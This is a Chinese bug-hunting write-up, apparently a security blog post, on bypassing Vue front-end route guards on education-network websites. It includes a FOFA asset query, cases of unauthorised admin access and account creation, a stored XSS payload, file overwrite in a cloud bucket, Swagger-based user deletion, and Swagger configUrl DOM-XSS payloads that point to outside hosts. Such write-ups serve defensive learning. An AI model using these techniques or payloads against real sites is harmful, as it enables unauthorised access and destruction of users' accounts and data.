Vue 前端鉴权绕过实战技巧，详解路由守卫漏洞原理

0x01 简介

当下大量教育类站点基于 Vue 开发，开发者常将路由鉴权仅部署在前端守卫中，依赖本地 Token 做页面访问控制，缺失后端接口校验，存在严重逻辑缺陷。本文依托 FOFA 精准测绘 EDU 资产，搭配专用浏览器插件解析路由与隐藏接口，结合多起真实实战案例，完整演示前端鉴权绕过、后台未授权闯入、XSS 漏洞构造、文件上传覆盖、Swagger 接口越权等全套挖掘手法，拆解 Vue 站点常见安全短板与利用思路。

本文仅用于技术学习与合规交流，严禁非法滥用。因违规使用产生的一切后果，由使用者自行承担，与作者无关。

现在只对常读和星标的才展示大图推送，建议大家把渗透安全HackTwo“设为星标”，否则可能就看不到了啦！

末尾可领取挖洞资料/加圈子 #渗透安全HackTwo

0x02 正文详情

工具与插件准备

无需复杂搭建环境，仅需两款浏览器插件即可开展测试：

1. AntiDebug_Breaker：基于 HookJS 开发，用于前端 JS 逆向、反调试绕过和渗透信息收集。

2. Vue 路由分析插件：专门解析 Vue 站点路由结构，绕过路由守卫，快速发现隐藏后台接口与未授权路径。配合 FOFA 测绘、无影资产探活工具，即可批量筛选目标资产。

资产信息收集

采用 FOFA 专属测绘语法，精准定位教育网 Vue 资产：

org="China Education and Research Network Center" && icon_hash=="-1252041730"

筛选出教育网机构资产，依靠 Vue 图标特征锁定框架站点，导出资产后用无影工具批量探活、页面截屏，从截图中挑选后台、登录类页面作为测试目标。

插件AntiDebug_Breaker

本插件是基于Hook_JS库所写的Google插件，将致力于辅助前端JavaScript逆向以及渗透测试信息收集。

https://pan.quark.cn/s/102b694ddb11

插件VueCrack

这是一个专为红队人员开发的浏览器插件，用于分析Vue框架网站的路由结构，并绕过路由守卫，从而发现站点的隐藏资产与未授权访问漏洞。

具体插件使用看对应的readme就行。

信息收集

因为我们要打vue组件，直接找对应的组件就ok

我这里使用fofa的这个语法来测绘

org="China Education and Research Network Center" && icon_hash=="-1252041730"org #指定机构是eduicon_hash #根据图标指定是vue组件

把资产给导出来，然后丢到无影里面探活，并且截屏，我们根据截屏的内容选择简单的进行测试即可。

漏洞挖掘

案例1

通过截图发现这个登录框

刚开始需要登录，试了几个弱口令没结果，因为我们找的都是vue组件的资产，所以直接使用插件vuecrack看看接口

发现一个管理接口/adminxxxxx 但是直接访问会跳转到登录页面

配合另一个插件清除跳转进行测试

成功未授权访问到这个页面

除了用户管理，其他功能都点击不了

点击用户管理可以看到这个-> 新增用户

输入符合规则的用户名和密码成功创建用户成功

回到登录页面，输入我们创建的用户，成功登录

后续可以对系统的其他功能进行操作

比如服务管理这里可以重启停止相关接口

还可以增删改查各种服务ai相关服务

以及备份清除备份等操作

成功利用未授权从0->1，实现对系统的简单测试。

案例2

继续找资产进行测试，锁定到了这个页面

我们直接看插件接口

发现有很多直接一个一个点击进行查看就行，或者有师傅写了每隔一段时间自动跳转的脚本，可以自行查阅一手。这里接口不多，直接手工测试。

经过一番点点点发现这个页面，可以添加热点问题，我们添加一个测试问题，发现确实可以添加成功

本着有框就插的原则，测试一下xss漏洞，这里不要弹窗，容易出问题，因为我们只能添加热点问题的权限，而没有删除权限。

点击保存成功添加，但是发现有的解析了，有的没解析，所以给每个框，都插一下是最好的测试方法。

poc

<img src=x onerror=console.log(1)>

右键F12查看控制台，发现可以成功打印

其他页面测试方法也是同理不在一一进行说明

案例3

继续测试看到这个页面，看起来像是静态的

我们直接查看插件，从插件里面找到了/upload这个接口

访问之后是这样的

我们上传图片进行测试，发现返回了路径

但是根据这个名字，应该是被上传到桶里面了

修改后缀为.html进行上传看能不能水一个xss

结果不太行，能上传但是访问之后会被下载下来

我们添加这个自定义响应解析方式进行测试，?response-content-type=text/html，某些情况会被解析

比如这个案例

但是这里不太行，会提示匿名用户没有修改content-type的修改操作权限

这里既然有云桶的地址了，对云桶相关的漏洞可以测试一下

这里都是没有的，对桶做了严格的限制。

继续回到刚才的上传包发现上传之后，名字是不变的

访问之后是这个

不要修改名字，修改上传内容，进行上传看能否进行覆盖

再次进行访问，成功进行覆盖。。

正常情况这个站点的测试已经结束了，但是插件给我扫到了一个swagger页面

这种接口也好测试，可以利用工具比如apihunter这些，也可以利用插件apikit之类的

我这里手工进行测试几个证明危害，一个接口就是一个功能

重点找用户相关，上传相关，管理相关的这种测试就行。

创建用户测试，输入符合规则的信息就行

使用删除用户接口对我们刚才创建的用户进行删除，进行危害证明

发现可以成功删除，这里删除用户是通过用户名来进行鉴权的

也就是说可以通过fuzz用户名删除整个系统的所有用户。

我们在遇到了这个swagger页面的时候不要只是测试接口，针对edu是可以这么做的，因为edu不收domxss,但是项目或者众测，src啥的一定要试试这个domxss的相关测试

poc

?configUrl= https://xss.smarpo.com/test.json /swagger-ui.html?configUrl=https://jumpy-floor.surge.sh/test.json /swagger-ui.html?url=https://jumpy-floor.surge.sh/test.json /swagger-ui.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

其他测试不在一一说明

0x03 总结

Vue 框架属实是前端鉴权的 “重灾区”，不少开发者把权限全堆在前端路由里，只靠个 Token 就想把门看好，纯属自欺欺人。随便控制台造个假 Token、用上 Vue 专用插件，就能轻松绕过路由守卫。教育网 EDU 资产里这类漏洞遍地都是，既能溜进后台瞎逛、新建账号，还能挖到 XSS、上传覆盖、接口越权等问题，薅漏洞简直一挖一个准。。最后愿各位师傅在后续挖洞之路中，精准定位漏洞、高效挖掘，天天出高危、次次有收获，挖洞顺利、不踩坑、多拿奖励，共同提升支付业务安全测试能力！🔥喜欢这类文章或挖掘SRC技巧文章师傅可以点赞转发支持一下谢谢！